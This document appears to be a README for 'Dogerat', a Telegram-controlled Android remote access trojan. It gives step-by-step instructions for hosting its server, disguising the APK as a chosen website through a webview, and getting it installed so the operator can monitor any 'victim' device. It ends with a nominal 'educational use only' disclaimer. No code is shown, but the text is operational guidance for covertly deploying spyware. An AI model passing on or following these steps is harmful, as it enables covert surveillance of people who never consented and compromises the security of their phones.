Telegram based Android RAT without Port Forwarding


How to use

Step 1 : Search BotFather on Telegram
Step 2 : Creat a bot with any name/username
Step 3 : Copy your Bot token

Step 3 : Go To > Click Here

Then Login Now
Step 4 : New Project Then Click-Helo-Node

  • Delete all pre-available files {clcik on 3 dots}

click on files and upload package.json, server.js


STEP 5 : Paste your bot token in line 16 {beetwen ''}
  • Paste your chat id in line 15 (search userinfobot on telegram and send any msg you will get your chatid
  • click on previvew availble on bottom
  • open in new window

if you see this type then copy url and close all tabs

  • now open Apkeditor select apk
  • go to following directory

paste your glitch url 
  • note: In webview you can add any website
  • when victim will open apk given website will be open in apk
  • must replace https to wss
  • click on save, and go back

  • clcik on smail and wait 3/4 second
  • Now build the apk
  • and install in any phone

  • now go to BotFather clcik on your botusername
  • start your bot
  • now you can monitor all device who will install the apk

Disclaimer :

The developer makes no warranty for this software and is not responsible for any direct or indirect damages caused by the use of this tool. Dogerat is created for educational and internal use ONLY.




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